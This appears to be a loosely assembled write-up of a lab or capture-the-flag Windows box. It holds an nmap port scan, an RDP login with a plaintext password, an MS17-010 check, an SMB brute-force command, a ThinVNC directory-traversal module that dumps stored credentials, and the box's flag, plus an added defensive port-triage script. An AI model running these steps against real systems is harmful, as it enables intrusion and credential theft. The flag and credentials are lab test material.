As always, I start with an nmap scan.

└──╼ #nmap -Pn -p1-65535 -oN 69.nmap
Starting Nmap 7.80 ( ) at 2020-08-26 11:42 BST
Stats: 0:00:40 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 69.38% done; ETC: 11:43 (0:00:18 remaining)
Nmap scan report for
Host is up (0.032s latency).
Not shown: 65521 closed ports
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5040/tcp open unknown
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
50417/tcp open unknown
60000/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 57.50 seconds
└──╼ #
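Read from the defender's side, the scan above splits into three groups: management services to restrict, a run of adjacent high ports typical of Windows RPC endpoints, and isolated unknown ports that need an owner (60000 is the one the ThinVNC module is pointed at later). The Python below is an added example, not part of the original write-up; the `RESTRICT` policy and the adjacent-run heuristic are assumptions.

```python
import re

# Port lines copied from the scan output above (sample input for this example).
SCAN = """\
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5040/tcp open unknown
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
50417/tcp open unknown
60000/tcp open unknown
"""

PORT_LINE = re.compile(r"^(\d{1,5})/(tcp|udp)\s+open\s+(\S+)")
# Assumed policy: services that should only be reachable from a management network.
RESTRICT = {"msrpc", "netbios-ssn", "microsoft-ds", "ms-wbt-server"}
DYNAMIC_START = 49152  # default Windows dynamic range; RPC endpoints tend to sit in adjacent ports here

def parse_open_ports(text):
    """Return sorted [(port, service)] for every 'open' line of nmap -oN output."""
    hits = (PORT_LINE.match(line.strip()) for line in text.splitlines())
    return sorted((int(m.group(1)), m.group(3)) for m in hits if m)

def triage(ports):
    """Bucket ports: restrict, likely RPC (runs of >= 3 adjacent unknowns), identify."""
    buckets = {"restrict": [p for p, svc in ports if svc in RESTRICT],
               "likely_rpc": [],
               "identify": [p for p, svc in ports if svc != "unknown" and svc not in RESTRICT]}
    unknown = [p for p, svc in ports if svc == "unknown"]
    run = []
    for p in unknown + [None]:  # the trailing None flushes the final run
        if run and p is not None and p == run[-1] + 1:
            run.append(p)
            continue
        if len(run) >= 3 and run[0] >= DYNAMIC_START:
            buckets["likely_rpc"] += run
        else:
            buckets["identify"] += run
        run = [p]
    return buckets
```

Ports left in `identify` are the ones to follow up with service detection and an owner lookup before deciding whether they should be reachable at all.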

$xfreerdp /u:puck /p:Geheim2020 /v:

msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts
rhosts =>
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[-] – An SMB Login Error occurred while connecting to the IPC$ tree.
[*] – Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) >

Password Brute-forcing using Nmap

ubuntu@ubuntu:~$ nmap --script smb-brute -p445 --script-args userdb=users.txt,passdb=passwords.txt

Install Nmap-Vulners
To install the nmap-vulners script, we’ll first use cd to change into the Nmap scripts directory.

cd /usr/share/nmap/scripts/
Then, clone the nmap-vulners GitHub repository by typing the below command into a terminal. That’s it for installing nmap-vulners. There’s absolutely no configuration required after installing it.

git clone

Cloning into ‘nmap-vulners’…
remote: Counting objects: 28, done.
remote: Compressing objects: 100% (23/23), done.
remote: Total 28 (delta 9), reused 19 (delta 4), pack-reused 0
Unpacking objects: 100% (28/28), done.

msf6 auxiliary(scanner/http/thinvnc_traversal) > set rhosts
rhosts =>
msf6 auxiliary(scanner/http/thinvnc_traversal) > set rport 60000
rport => 60000
msf6 auxiliary(scanner/http/thinvnc_traversal) > run

[+] File ThinVnc.ini saved in: /root/.msf4/loot/20200826122605_default_10.150.150.69_thinvnc.traversa_219192.txt
[+] Found credentials: desperado:TooComplicatedToGuessMeAhahahahahahahh
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/thinvnc_traversal) >

flag67 = 2971f3459fe55db1237aad5e0f0a259a41633962

However, if you see the following in the “Write-Up” box, you can publish online the explanations of how you compromised that box but we ask you in return to give us credit for the machines by adding backlink to  and  in your write-up.
